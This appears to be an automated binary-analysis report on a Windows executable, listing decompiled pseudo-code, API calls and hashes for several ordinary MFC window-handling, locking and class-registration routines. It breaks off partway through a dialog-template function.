Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocString$H_prolog3_memset
String ID:
API String ID: 842698744-0
Opcode ID: 325f9cc5fa8ca118e27e7f32e288bfa91b50bda65fdb05eb54b1ef442072e336
Instruction ID: 9c01246f313d45af70bf27f06baaae5a18734526c2a04a99717f9e2c99b62bdd
Opcode Fuzzy Hash: 325f9cc5fa8ca118e27e7f32e288bfa91b50bda65fdb05eb54b1ef442072e336
Instruction Fuzzy Hash: F6416F30A00218DFCB34AF79D881A9EB7B5BF54314F50852FE465A72E2DB78A944CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040DD73, Relevance: 9.1, APIs: 6, Instructions: 115
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040DD73(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t37;
				signed int _t54;
				intOrPtr _t57;
				long _t60;
				struct HWND__* _t63;
				CHAR* _t64;
				void* _t65;
				void* _t71;
				long _t73;
				void* _t74;
				void* _t75;
				signed int _t77;
				void* _t78;
				signed int _t79;
				void* _t81;

				_t71 = __edx;
				_t79 = _t81 - 0x9c;
				_t37 =  *0x44f5d0; // 0x765b253d
				 *(_t79 + 0x98) = _t37 ^ _t79;
				_t73 =  *(_t79 + 0xa4);
				_t77 = 0;
				 *((intOrPtr*)(_t79 - 0x80)) =  *((intOrPtr*)(_t79 + 0xa8));
				E0040DC94(0);
				_t63 = E0040DCC8(0, _t79 - 0x70);
				 *(_t79 - 0x7c) = _t63;
				if(_t63 !=  *(_t79 - 0x70)) {
					EnableWindow(_t63, 1);
				}
				 *(_t79 - 0x78) =  *(_t79 - 0x78) & _t77;
				GetWindowThreadProcessId(_t63, _t79 - 0x78);
				if(_t63 == 0 ||  *(_t79 - 0x78) != GetCurrentProcessId()) {
					L6:
					__eflags = _t73;
					if(__eflags != 0) {
						_t77 = _t73 + 0x78;
					}
					goto L8;
				} else {
					_t60 = SendMessageA(_t63, 0x376, 0, 0);
					if(_t60 == 0) {
						goto L6;
					} else {
						_t77 = _t60;
						L8:
						 *(_t79 - 0x74) =  *(_t79 - 0x74) & 0x00000000;
						if(_t77 != 0) {
							 *(_t79 - 0x74) =  *_t77;
							_t57 =  *((intOrPtr*)(_t79 + 0xb0));
							if(_t57 != 0) {
								 *_t77 = _t57 + 0x30000;
							}
						}
						if(( *(_t79 + 0xac) & 0x000000f0) == 0) {
							_t54 =  *(_t79 + 0xac) & 0x0000000f;
							if(_t54 <= 1) {
								_t24 = _t79 + 0xac;
								 *_t24 =  *(_t79 + 0xac) | 0x00000030;
								__eflags =  *_t24;
							} else {
								if(_t54 + 0xfffffffd <= 1) {
									 *(_t79 + 0xac) =  *(_t79 + 0xac) | 0x00000020;
								}
							}
						}
						_t96 = _t73;
						 *(_t79 - 0x6c) = 0;
						if(_t73 == 0) {
							_t64 = _t79 - 0x6c;
							_t73 = 0x104;
							__eflags = GetModuleFileNameA(0, _t64, 0x104) - 0x104;
							if(__eflags == 0) {
								 *((char*)(_t79 + 0x97)) = 0;
							}
						} else {
							_t64 =  *(_t73 + 0x50);
						}
						_push( *(_t79 + 0xac));
						_push(_t64);
						_push( *((intOrPtr*)(_t79 - 0x80)));
						_push( *(_t79 - 0x7c));
						_t74 = E0040DBFD(_t64, _t73, _t77, _t96);
						if(_t77 != 0) {
							 *_t77 =  *(_t79 - 0x74);
						}
						if( *(_t79 - 0x70) != 0) {
							EnableWindow( *(_t79 - 0x70), 1);
						}
						E0040DC94(1);
						_pop(_t75);
						_pop(_t78);
						_pop(_t65);
						return E0042569C(_t74, _t65,  *(_t79 + 0x98) ^ _t79, _t71, _t75, _t78);
					}
				}
			}

0x0040dd73
0x0040dd74
0x0040dd81
0x0040dd88
0x0040dd97
0x0040dd9d
0x0040dda0
0x0040dda3
0x0040ddb3
0x0040ddb8
0x0040ddbb
0x0040ddc0
0x0040ddc0
0x0040ddc6
0x0040ddce
0x0040ddd6
0x0040ddfb
0x0040ddfb
0x0040ddfd
0x0040ddff
0x0040ddff
0x00000000
0x0040dde3
0x0040dded
0x0040ddf5
0x00000000
0x0040ddf7
0x0040ddf7
0x0040de02
0x0040de02
0x0040de08
0x0040de0c
0x0040de0f
0x0040de17
0x0040de1e
0x0040de1e
0x0040de17
0x0040de27
0x0040de2f
0x0040de35
0x0040de48
0x0040de48
0x0040de48
0x0040de37
0x0040de3d
0x0040de3f
0x0040de3f
0x0040de3d
0x0040de35
0x0040de4f
0x0040de51
0x0040de55
0x0040de5c
0x0040de5f
0x0040de70
0x0040de72
0x0040de74
0x0040de74
0x0040de57
0x0040de57
0x0040de57
0x0040de7b
0x0040de81
0x0040de82
0x0040de85
0x0040de92
0x0040de94
0x0040de99
0x0040de99
0x0040de9f
0x0040dea6
0x0040dea6
0x0040deae
0x0040debc
0x0040debd
0x0040dec0
0x0040decd
0x0040decd
0x0040ddf5

APIs

Part of subcall function 0040DCC8: GetParent.USER32(?), ref: 0040DD1B
Part of subcall function 0040DCC8: GetLastActivePopup.USER32(?), ref: 0040DD2A
Part of subcall function 0040DCC8: IsWindowEnabled.USER32(?), ref: 0040DD3F
Part of subcall function 0040DCC8: EnableWindow.USER32(?,00000000), ref: 0040DD52

EnableWindow.USER32(?,00000001), ref: 0040DDC0
GetWindowThreadProcessId.USER32(?,?), ref: 0040DDCE
GetCurrentProcessId.KERNEL32 ref: 0040DDD8
SendMessageA.USER32(?,00000376,00000000,00000000), ref: 0040DDED
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040DE6A
EnableWindow.USER32(?,00000001), ref: 0040DEA6

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID:
API String ID: 1877664794-0
Opcode ID: ebb91f4f9c23817995b6fbd71b736e976144b2346346b7f2189059c6cd601d45
Instruction ID: 3e0975815654ba29b9fd2e6189b03887221eb6c9a09134e4549fe7e71712cb9d
Opcode Fuzzy Hash: ebb91f4f9c23817995b6fbd71b736e976144b2346346b7f2189059c6cd601d45
Instruction Fuzzy Hash: 71419032E007089FEB309FA4DC85B9EB7B5AF15714F24003AE905AB2C1D7789948CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040DCC8, Relevance: 9.1, APIs: 6, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DCC8(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E0040DBF1();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x20);
					goto L7;
				}
				_t13 = E0040A3FC();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}

0x0040dcd0
0x0040dcd8
0x0040dcda
0x0040dcf7
0x0040dd05
0x0040dd10
0x0040dd12
0x0040dd14
0x0040dd16
0x0040dd21
0x0040dd23
0x0040dd30
0x0040dd30
0x0040dd32
0x0040dd38
0x0040dd3c
0x0040dd5a
0x0040dd4d
0x0040dd50
0x0040dd52
0x0040dd52
0x0040dd3c
0x0040dd63
0x00000000
0x00000000
0x00000000
0x0040dd18
0x0040dd18
0x0040dd19
0x0040dd1b
0x0040dd1d
0x00000000
0x0040dd18
0x0040dd0a
0x0040dd0c
0x0040dd0e
0x00000000
0x00000000
0x00000000
0x0040dd0e
0x0040dcdc
0x0040dce3
0x0040dcf2
0x0040dcf2
0x00000000
0x0040dcf2
0x0040dce5
0x0040dcec
0x00000000
0x00000000
0x0040dcee
0x00000000

APIs

GetWindowLongA.USER32 ref: 0040DCFA
GetParent.USER32(?), ref: 0040DD08
GetParent.USER32(?), ref: 0040DD1B
GetLastActivePopup.USER32(?), ref: 0040DD2A
IsWindowEnabled.USER32(?), ref: 0040DD3F
EnableWindow.USER32(?,00000000), ref: 0040DD52

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 1a19f39ab51fab3e4b5f9f51d1c5c276803f9ae97a759c2700da5930deac3b70
Instruction ID: d2f2613dfca7d6d7f90c4651122caaab590fcb5cea5d41ec1da91b5b8676534e
Opcode Fuzzy Hash: 1a19f39ab51fab3e4b5f9f51d1c5c276803f9ae97a759c2700da5930deac3b70
Instruction Fuzzy Hash: 46118F32E0423157D6216AE95C40B2BB6ACAF69B51F15023BEC01F33D4DB78EC09929D

Uniqueness

Uniqueness Score: -1.00%

Function 00416C2C, Relevance: 9.0, APIs: 6, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E00416C2C(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_push(5);
				_push(_a4);
				while(1) {
					_t12 = GetWindow();
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_push(2);
					_push(_t21);
				}
				return _t12;
			}

0x00416c3b
0x00416c47
0x00416c49
0x00416c8c
0x00416c8c
0x00416c8e
0x00416c92
0x00000000
0x00000000
0x00416c58
0x00416c6f
0x00416c75
0x00416c87
0x00000000
0x00416c9a
0x00416c87
0x00416c89
0x00416c8b
0x00416c8b
0x00416c97

APIs

ClientToScreen.USER32(?,?), ref: 00416C3B
GetDlgCtrlID.USER32 ref: 00416C4F
GetWindowLongA.USER32 ref: 00416C5D
GetWindowRect.USER32 ref: 00416C6F
PtInRect.USER32(?,?,?), ref: 00416C7F
GetWindow.USER32(?,00000005), ref: 00416C8C

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 834ef4c14d53aea787e54c4317d745187f2c29fc914ae260d9030daf24c63fc6
Instruction ID: d82dac906f262a072475043fedb3f2b42160409d5295021524ec7a04062182e9
Opcode Fuzzy Hash: 834ef4c14d53aea787e54c4317d745187f2c29fc914ae260d9030daf24c63fc6
Instruction Fuzzy Hash: F401A235500119BBDB21AF58AC08FEF3B2CEF00750F014125FD45D2190E738D9518BD9

Uniqueness

Uniqueness Score: -1.00%

Function 004209A7, Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004209A7(void* __ebp, char _a4) {
				struct _CRITICAL_SECTION* _t4;
				void* _t10;
				signed int _t11;
				intOrPtr* _t15;
				void* _t17;

				_t17 = __ebp;
				_t1 =  &_a4; // 0x765b253d
				_t11 =  *_t1;
				if(_t11 >= 0x11) {
					_t4 = E00415838(_t10);
				}
				if( *0x452838 == 0) {
					_t4 = E00420983();
				}
				_push(_t17);
				_t15 = 0x4529f0 + _t11 * 4;
				if( *_t15 == 0) {
					EnterCriticalSection(0x4529d8);
					if( *_t15 == 0) {
						_t4 = 0x452840 + _t11 * 0x18;
						InitializeCriticalSection(_t4);
						 *_t15 =  *_t15 + 1;
					}
					LeaveCriticalSection(0x4529d8);
				}
				EnterCriticalSection(0x452840 + _t11 * 0x18);
				return _t4;
			}

0x004209a7
0x004209a8
0x004209a8
0x004209af
0x004209b1
0x004209b1
0x004209bd
0x004209bf
0x004209bf
0x004209cb
0x004209cd
0x004209dc
0x004209e3
0x004209e8
0x004209ef
0x004209f2
0x004209f8
0x004209f8
0x004209ff
0x004209ff
0x00420a0b
0x00420a11

APIs

EnterCriticalSection.KERNEL32(004529D8,?,?,?,?,00416E1D,00000010,00000008,0040E6AD,0040E650,0040D295,0040BAA3,?,00401099,00000000,765B253D), ref: 004209E3
InitializeCriticalSection.KERNEL32(=%[v,?,?,?,?,00416E1D,00000010,00000008,0040E6AD,0040E650,0040D295,0040BAA3,?,00401099,00000000,765B253D), ref: 004209F2
LeaveCriticalSection.KERNEL32(004529D8,?,?,?,?,00416E1D,00000010,00000008,0040E6AD,0040E650,0040D295,0040BAA3,?,00401099,00000000,765B253D), ref: 004209FF
EnterCriticalSection.KERNEL32(=%[v,?,?,?,?,00416E1D,00000010,00000008,0040E6AD,0040E650,0040D295,0040BAA3,?,00401099,00000000,765B253D), ref: 00420A0B

Part of subcall function 00415838: __CxxThrowException@8.LIBCMT ref: 0041584C

Strings

@(E, xrefs: 004209D7
=%[v, xrefs: 004209A8, 004209F1, 00420A0A

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
String ID: =%[v$@(E
API String ID: 3253506028-4069903545
Opcode ID: 76c733bfa3f9be638516b75e0970b0057b3ff9808dbc08cc3a6b71f2b021d23e
Instruction ID: 0b45ed2ce7d1d7c0d3b73bbd124780f87e8a73dcbb789e9f84b6d13e0c2184a1
Opcode Fuzzy Hash: 76c733bfa3f9be638516b75e0970b0057b3ff9808dbc08cc3a6b71f2b021d23e
Instruction Fuzzy Hash: A6F0F6F3B002149FEA106B58FD8471AB699FB92326F91122BF04142257D7B884C1CA6C

Uniqueness

Uniqueness Score: -1.00%

Function 004136E3, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 234
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E004136E3(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				signed int _v56;
				void* __ebp;
				intOrPtr _t122;
				void* _t128;
				intOrPtr _t130;
				signed int _t139;
				signed int _t144;
				signed int _t175;
				signed int _t177;
				signed int _t179;
				signed int _t181;
				signed int _t183;
				signed int _t187;
				void* _t190;
				intOrPtr _t191;
				signed int _t201;

				_t190 = __ecx;
				_t122 = E0040E67F(__ebx, __edi, __esi, __eflags);
				_v8 = _t122;
				_t3 =  &_a4;
				 *_t3 = _a4 &  !( *(_t122 + 0x18));
				if( *_t3 == 0) {
					return 1;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t201 = 0;
				E004277B0(0,  &_v56, 0, 0x28);
				_v52 = DefWindowProcA;
				_t128 = E0040E67F(__ebx, 0, 0, __eflags);
				__eflags = _a4 & 0x00000001;
				_v40 =  *((intOrPtr*)(_t128 + 8));
				_t130 =  *0x452820; // 0x10003
				_t187 = 8;
				_v32 = _t130;
				_v16 = _t187;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0xb;
					_v20 = "AfxWnd80s";
					_t183 = E004134FF(_t187, 0, 0, __eflags);
					__eflags = _t183;
					if(_t183 != 0) {
						_t201 = 1;
						__eflags = 1;
					}
				}
				__eflags = _a4 & 0x00000020;
				if(__eflags != 0) {
					_v56 = _v56 | 0x0000008b;
					_push( &_v56);
					_v20 = "AfxOleControl80s";
					_t181 = E004134FF(_t187, 0, _t201, __eflags);
					__eflags = _t181;
					if(_t181 != 0) {
						_t201 = _t201 | 0x00000020;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000002;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0;
					_v20 = "AfxControlBar80s";
					_v28 = 0x10;
					_t179 = E004134FF(_t187, 0, _t201, __eflags);
					__eflags = _t179;
					if(_t179 != 0) {
						_t201 = _t201 | 0x00000002;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000004;
				if(__eflags != 0) {
					_v56 = _t187;
					_v28 = 0;
					_t177 = E004136A2(__eflags,  &_v56, "AfxMDIFrame80s", 0x7a01);
					__eflags = _t177;
					if(_t177 != 0) {
						_t201 = _t201 | 0x00000004;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & _t187;
				if(__eflags != 0) {
					_v56 = 0xb;
					_v28 = 6;
					_t175 = E004136A2(__eflags,  &_v56, "AfxFrameOrView80s", 0x7a02);
					__eflags = _t175;
					if(_t175 != 0) {
						_t201 = _t201 | _t187;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000010;
				if(__eflags != 0) {
					_v12 = 0xff;
					_t201 = _t201 | E0041136D(_t187, _t190, _t201, __eflags,  &_v16, 0x3fc0);
					_t48 =  &_a4;
					 *_t48 = _a4 & 0xffffc03f;
					__eflags =  *_t48;
				}
				__eflags = _a4 & 0x00000040;
				if(__eflags != 0) {
					_v12 = 0x10;
					_t201 = _t201 | E0041136D(_t187, _t190, _t201, __eflags,  &_v16, 0x40);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000080;
				if(__eflags != 0) {
					_v12 = 2;
					_t201 = _t201 | E0041136D(_t187, _t190, _t201, __eflags,  &_v16, 0x80);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000100;
				if(__eflags != 0) {
					_v12 = _t187;
					_t201 = _t201 | E0041136D(_t187, _t190, _t201, __eflags,  &_v16, 0x100);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000200;
				if(__eflags != 0) {
					_v12 = 0x20;
					_t201 = _t201 | E0041136D(_t187, _t190, _t201, __eflags,  &_v16, 0x200);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000400;
				if(__eflags != 0) {
					_v12 = 1;
					_t201 = _t201 | E0041136D(0x400, _t190, _t201, __eflags,  &_v16, 0x400);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000800;
				if(__eflags != 0) {
					_v12 = 0x40;
					_t201 = _t201 | E0041136D(0x400, _t190, _t201, __eflags,  &_v16, 0x800);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00001000;
				if(__eflags != 0) {
					_v12 = 4;
					_t201 = _t201 | E0041136D(0x400, _t190, _t201, __eflags,  &_v16, 0x1000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00002000;
				if(__eflags != 0) {
					_v12 = 0x80;
					_t201 = _t201 | E0041136D(0x400, _t190, _t201, __eflags,  &_v16, 0x2000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00004000;
				if(__eflags != 0) {
					_v12 = 0x800;
					_t201 = _t201 | E0041136D(0x400, _t190, _t201, __eflags,  &_v16, 0x4000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00008000;
				if(__eflags != 0) {
					_v12 = 0x400;
					_t201 = _t201 | E0041136D(0x400, _t190, _t201, __eflags,  &_v16, 0x8000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00010000;
				if(__eflags != 0) {
					_v12 = 0x200;
					_t201 = _t201 | E0041136D(0x400, _t190, _t201, __eflags,  &_v16, 0x10000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00020000;
				if(__eflags != 0) {
					_v12 = 0x100;
					_t201 = _t201 | E0041136D(0x400, _t190, _t201, __eflags,  &_v16, 0x20000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00040000;
				if(__eflags != 0) {
					_v12 = 0x8000;
					_t201 = _t201 | E0041136D(0x400, _t190, _t201, __eflags,  &_v16, 0x40000);
					__eflags = _t201;
				}
				_t191 = _v8;
				 *(_t191 + 0x18) =  *(_t191 + 0x18) | _t201;
				_t139 =  *(_t191 + 0x18);
				__eflags = (_t139 & 0x00003fc0) - 0x3fc0;
				if((_t139 & 0x00003fc0) == 0x3fc0) {
					 *(_t191 + 0x18) = _t139 | 0x00000010;
					_t201 = _t201 | 0x00000010;
					__eflags = _t201;
				}
				asm("sbb eax, eax");
				_t144 =  ~((_t201 & _a4) - _a4) + 1;
				__eflags = _t144;
				return _t144;
			}

0x004136e3
0x004136e9
0x004136ee
0x004136f6
0x004136f6
0x004136f9
0x00000000
0x004136fd
0x00413703
0x00413704
0x00413705
0x0041370f
0x00413711
0x0041371e
0x00413721
0x00413726
0x0041372f
0x00413732
0x00413737
0x00413738
0x0041373b
0x0041373e
0x00413743
0x00413744
0x0041374b
0x00413752
0x00413757
0x00413759
0x0041375b
0x0041375b
0x0041375b
0x00413759
0x0041375c
0x00413760
0x00413762
0x0041376c
0x0041376d
0x00413774
0x00413779
0x0041377b
0x0041377d
0x0041377d
0x0041377d
0x0041377b
0x00413780
0x00413784
0x00413789
0x0041378a
0x0041378d
0x00413794
0x0041379b
0x004137a0
0x004137a2
0x004137a4
0x004137a4
0x004137a4
0x004137a2
0x004137a7
0x004137ab
0x004137bb
0x004137be
0x004137c1
0x004137c6
0x004137c8
0x004137ca
0x004137ca
0x004137ca
0x004137c8
0x004137cd
0x004137d0
0x004137e0
0x004137e7
0x004137ee
0x004137f3
0x004137f5
0x004137f7
0x004137f7
0x004137f7
0x004137f5
0x004137f9
0x004137fd
0x00413808
0x00413814
0x00413816
0x00413816
0x00413816
0x00413816
0x0041381d
0x00413821
0x00413829
0x00413835
0x00413835
0x00413835
0x00413837
0x0041383b
0x00413846
0x00413852
0x00413852
0x00413852
0x00413859
0x0041385c
0x00413863
0x0041386b
0x0041386b
0x0041386b
0x00413872
0x00413875
0x0041387c
0x00413888
0x00413888
0x00413888
0x0041388f
0x00413892
0x00413899
0x004138a5
0x004138a5
0x004138a5
0x004138ac
0x004138af
0x004138b6
0x004138c2
0x004138c2
0x004138c2
0x004138c9
0x004138cc
0x004138d3
0x004138df
0x004138df
0x004138df
0x004138e6
0x004138e9
0x004138f0
0x004138fc
0x004138fc
0x004138fc
0x00413903
0x00413906
0x0041390d
0x00413915
0x00413915
0x00413915
0x0041391c
0x0041391f
0x00413926
0x0041392e
0x0041392e
0x0041392e
0x00413935
0x00413938
0x0041393f
0x0041394b
0x0041394b
0x0041394b
0x00413952
0x00413955
0x0041395c
0x00413968
0x00413968
0x00413968
0x0041396f
0x00413972
0x00413979
0x00413981
0x00413981
0x00413981
0x00413983
0x00413986
0x00413989
0x00413995
0x00413997
0x0041399c
0x0041399f
0x0041399f
0x0041399f
0x004139ae
0x004139b0
0x004139b0
0x00000000

APIs

_memset.LIBCMT ref: 00413711

Strings

AfxMDIFrame80s, xrefs: 004137B2
@, xrefs: 0041381D
AfxFrameOrView80s, xrefs: 004137D7
@, xrefs: 004138B6

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
API String ID: 2102423945-4122032997
Opcode ID: a5bef630ddeeebe15989abab7ec30aae97472784829266feab206ff9f3e805df
Instruction ID: e687f1bf12a9c6a9fdbd3b1c6f65c705da800bfc1633e0c8d9dd6433c5c1c0ef
Opcode Fuzzy Hash: a5bef630ddeeebe15989abab7ec30aae97472784829266feab206ff9f3e805df
Instruction Fuzzy Hash: 6D8143B1D0021DAADB50DF98D485BDEBBF8AF04349F20806BFD58E6181E7788B84C794

Uniqueness

Uniqueness Score: -1.00%

Function 00420604, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00420604(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
				signed int _v8;
				short _v72;
				char* _v76;
				signed int _v80;
				signed int* _v84;
				signed int _v88;
				intOrPtr _v92;
				void* __edi;
				void* __ebp;
				signed int _t54;
				void* _t66;
				short* _t70;
				signed int _t72;
				signed int _t81;
				signed int* _t83;
				short* _t84;
				void* _t91;
				signed int* _t98;
				signed int _t99;
				void** _t100;
				intOrPtr _t102;
				signed int _t104;
				signed int _t106;
				void* _t107;

				_t101 = __esi;
				_t97 = __edx;
				_t82 = __ebx;
				_t54 =  *0x44f5d0; // 0x765b253d
				_v8 = _t54 ^ _t106;
				_t100 = __ecx;
				_v76 = _a4;
				if(__ecx[1] != 0) {
					_push(__ebx);
					_push(__esi);
					_t83 = GlobalLock( *__ecx);
					_v84 = _t83;
					_v88 = 0 | _t83[0] == 0x0000ffff;
					_v80 = E00420466(_t83);
					_t102 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
					_v92 = _t102;
					if(_v88 == 0) {
						 *_t83 =  *_t83 | 0x00000040;
					} else {
						_t83[3] = _t83[3] | 0x00000040;
					}
					if(lstrlenA(_v76) >= 0x20) {
						L15:
						_t66 = 0;
					} else {
						_t97 = _t102 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
						_v76 = _t97;
						if(_t97 < _t102) {
							goto L15;
						} else {
							_t70 = E00420491(_t83);
							_t91 = 0;
							_t84 = _t70;
							if(_v80 != 0) {
								_t81 = E0042997E(_t84 + _t102);
								_t97 = _v76;
								_t91 = _t102 + 2 + _t81 * 2;
							}
							_t33 = _t97 + 3; // 0x3
							_t98 = _v84;
							_t36 = _t84 + 3; // 0x10002
							_t72 = _t91 + _t36 & 0xfffffffc;
							_t104 = _t84 + _t33 & 0xfffffffc;
							_v80 = _t72;
							if(_v88 == 0) {
								_t99 =  *(_t98 + 8) & 0x0000ffff;
							} else {
								_t99 =  *(_t98 + 0x10) & 0x0000ffff;
							}
							if(_v76 == _t91 || _t99 <= 0) {
								L17:
								 *_t84 = _a8;
								_t97 =  &_v72;
